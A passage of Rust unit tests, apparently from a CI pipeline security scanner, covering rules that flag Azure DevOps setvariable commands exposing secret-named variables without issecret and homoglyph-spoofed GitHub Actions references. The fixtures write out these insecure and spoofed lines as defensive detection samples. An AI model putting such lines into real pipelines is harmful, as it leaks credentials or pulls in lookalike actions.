10205    fn tf_output_setvariable_skips_when_setvariable_lacks_tf_capture_signal() {
10206        // Inline script emits `task.setvariable` but the source value is
10207        // a plain pipeline variable, not anything terraform-shaped.
10208        // Without a TF_OUT_* / `terraform output` capture signal in the
10209        // body, the rule must not fire — `self_mutating_pipeline`
10210        // already covers the generic setvariable primitive.
10211        let mut g = AuthorityGraph::new(source("ado.yml"));
10212        add_script_step_in_job(
10213            &mut g,
10214            "pure-setvar",
10215            "deploy",
10216            "Write-Host \"##vso[task.setvariable variable=gdsvms]$(BuildId)\"",
10217        );
10218        add_script_step_in_job(
10219            &mut g,
10220            "consume",
10221            "deploy",
10222            "$names = \"$(gdsvms)\" -split \",\"\n\
10223             foreach ($n in $names) { Invoke-Command -ComputerName $n -ScriptBlock {} }",
10224        );
10225
10226        let findings = terraform_output_via_setvariable_shell_expansion(&g);
10227        assert!(
10228            findings.is_empty(),
10229            "setvariable without terraform-output signal must not fire; got: {findings:#?}"
10230        );
10231    }
10232
10233    // ── setvariable_issecret_false ──────────────────────────
10234
10235    /// Helper: create an ADO-platform graph with a single Step whose
10236    /// `META_SCRIPT_BODY` is set to the given script.
10237    fn ado_graph_with_script(script: &str) -> AuthorityGraph {
10238        let mut g = graph_with_platform("azure-devops", "ado-pipeline.yml");
10239        let mut meta = std::collections::HashMap::new();
10240        meta.insert(META_SCRIPT_BODY.into(), script.into());
10241        g.add_node_with_metadata(NodeKind::Step, "script-step", TrustZone::FirstParty, meta);
10242        g
10243    }
10244
10245    #[test]
10246    fn setvariable_issecret_false_fires_on_explicit_false() {
10247        let g = ado_graph_with_script(
10248            r###"echo "##vso[task.setvariable variable=MY_TOKEN;issecret=false]$(token)""###,
10249        );
10250        let findings = setvariable_issecret_false(&g);
10251        assert_eq!(findings.len(), 1, "got: {findings:#?}");
10252        assert_eq!(findings[0].severity, Severity::High);
10253        assert_eq!(
10254            findings[0].category,
10255            FindingCategory::SetvariableIssecretFalse
10256        );
10257        assert!(findings[0].message.contains("MY_TOKEN"));
10258    }
10259
10260    #[test]
10261    fn setvariable_issecret_false_skips_issecret_true() {
10262        let g = ado_graph_with_script(
10263            r###"echo "##vso[task.setvariable variable=MY_TOKEN;issecret=true]$(token)""###,
10264        );
10265        let findings = setvariable_issecret_false(&g);
10266        assert!(
10267            findings.is_empty(),
10268            "issecret=true must not fire; got: {findings:#?}"
10269        );
10270    }
10271
10272    #[test]
10273    fn setvariable_issecret_false_skips_non_sensitive_name() {
10274        let g = ado_graph_with_script(
10275            r###"echo "##vso[task.setvariable variable=BUILD_NUMBER]$(rev)""###,
10276        );
10277        let findings = setvariable_issecret_false(&g);
10278        assert!(
10279            findings.is_empty(),
10280            "non-sensitive name must not fire; got: {findings:#?}"
10281        );
10282    }
10283
10284    #[test]
10285    fn setvariable_issecret_false_fires_when_flag_omitted() {
10286        let g = ado_graph_with_script(
10287            r###"echo "##vso[task.setvariable variable=DB_PASSWORD]$(db_pass)""###,
10288        );
10289        let findings = setvariable_issecret_false(&g);
10290        assert_eq!(findings.len(), 1, "got: {findings:#?}");
10291        assert!(findings[0].message.contains("DB_PASSWORD"));
10292    }
10293
10294    #[test]
10295    fn keyvaultname_does_not_fire() {
10296        // "key" is a substring of "keyvaultname" but not a token — must not fire.
10297        let g = ado_graph_with_script(
10298            r###"echo "##vso[task.setvariable variable=KEYVAULTNAME]my-vault""###,
10299        );
10300        let findings = setvariable_issecret_false(&g);
10301        assert!(
10302            findings.is_empty(),
10303            "keyvaultname must not fire (FP regression); got: {findings:#?}"
10304        );
10305    }
10306
10307    #[test]
10308    fn storage_account_key_still_fires() {
10309        // "key" is an exact token in "STORAGE_ACCOUNT_KEY" — must still fire.
10310        let g = ado_graph_with_script(
10311            r###"echo "##vso[task.setvariable variable=STORAGE_ACCOUNT_KEY]secret""###,
10312        );
10313        let findings = setvariable_issecret_false(&g);
10314        assert_eq!(
10315            findings.len(),
10316            1,
10317            "STORAGE_ACCOUNT_KEY must fire; got: {findings:#?}"
10318        );
10319        assert!(findings[0].message.contains("STORAGE_ACCOUNT_KEY"));
10320    }
10321
10322    #[test]
10323    fn github_author_email_does_not_fire() {
10324        // "auth" is a substring of "author" but not a token — must not fire.
10325        let g = ado_graph_with_script(
10326            r###"echo "##vso[task.setvariable variable=GITHUB_AUTHOR_EMAIL]user@example.com""###,
10327        );
10328        let findings = setvariable_issecret_false(&g);
10329        assert!(
10330            findings.is_empty(),
10331            "GITHUB_AUTHOR_EMAIL must not fire (FP regression); got: {findings:#?}"
10332        );
10333    }
10334
10335    #[test]
10336    fn cert_thumbprint_still_fires() {
10337        // "cert" is an exact token in "CERT_THUMBPRINT" — must still fire.
10338        let g = ado_graph_with_script(
10339            r###"echo "##vso[task.setvariable variable=CERT_THUMBPRINT]abc123""###,
10340        );
10341        let findings = setvariable_issecret_false(&g);
10342        assert_eq!(
10343            findings.len(),
10344            1,
10345            "CERT_THUMBPRINT must fire; got: {findings:#?}"
10346        );
10347        assert!(findings[0].message.contains("CERT_THUMBPRINT"));
10348    }
10349
10350    // ── homoglyph_in_action_ref ──────────────────────────────────
10351
10352    fn gha_graph_with_action(action: &str) -> AuthorityGraph {
10353        let mut g = AuthorityGraph::new(source("ci.yml"));
10354        g.metadata
10355            .insert(META_PLATFORM.into(), "github-actions".into());
10356        g.add_node(NodeKind::Image, action, TrustZone::ThirdParty);
10357        g
10358    }
10359
10360    #[test]
10361    fn pure_ascii_action_ref_not_flagged() {
10362        let g = gha_graph_with_action("actions/checkout@v4");
10363        let findings = check_homoglyph_in_action_ref(&g);
10364        assert!(
10365            findings.is_empty(),
10366            "pure ASCII action ref must not fire; got: {findings:#?}"
10367        );
10368    }
10369
10370    #[test]
10371    fn division_slash_homoglyph_flagged() {
10372        // U+2215 DIVISION SLASH instead of U+002F SOLIDUS
10373        let g = gha_graph_with_action("actions\u{2215}checkout@v4");
10374        let findings = check_homoglyph_in_action_ref(&g);
10375        assert_eq!(findings.len(), 1, "got: {findings:#?}");
10376        assert_eq!(findings[0].category, FindingCategory::HomoglyphInActionRef);
10377        assert_eq!(findings[0].severity, Severity::High);
10378        assert!(findings[0].message.contains("U+2215"));
10379    }
10380
10381    #[test]
10382    fn cyrillic_a_homoglyph_flagged() {
10383        // Cyrillic small letter a (U+0430) instead of Latin a (U+0061)
10384        let g = gha_graph_with_action("\u{0430}ctions/checkout@v4");
10385        let findings = check_homoglyph_in_action_ref(&g);
10386        assert_eq!(findings.len(), 1, "got: {findings:#?}");
10387        assert_eq!(findings[0].category, FindingCategory::HomoglyphInActionRef);
10388        assert!(findings[0].message.contains("U+0430"));
10389    }
10390
10391    #[test]
10392    fn homoglyph_rule_skips_non_gha_platform() {
10393        let mut g = AuthorityGraph::new(source("ado.yml"));
10394        g.metadata
10395            .insert(META_PLATFORM.into(), "azure-devops".into());
10396        g.add_node(
10397            NodeKind::Image,
10398            "\u{0430}ctions/checkout@v4",
10399            TrustZone::ThirdParty,
10400        );
10401        let findings = check_homoglyph_in_action_ref(&g);
10402        assert!(
10403            findings.is_empty(),
10404            "non-GHA platform must not fire; got: {findings:#?}"
10405        );
10406    }
10407}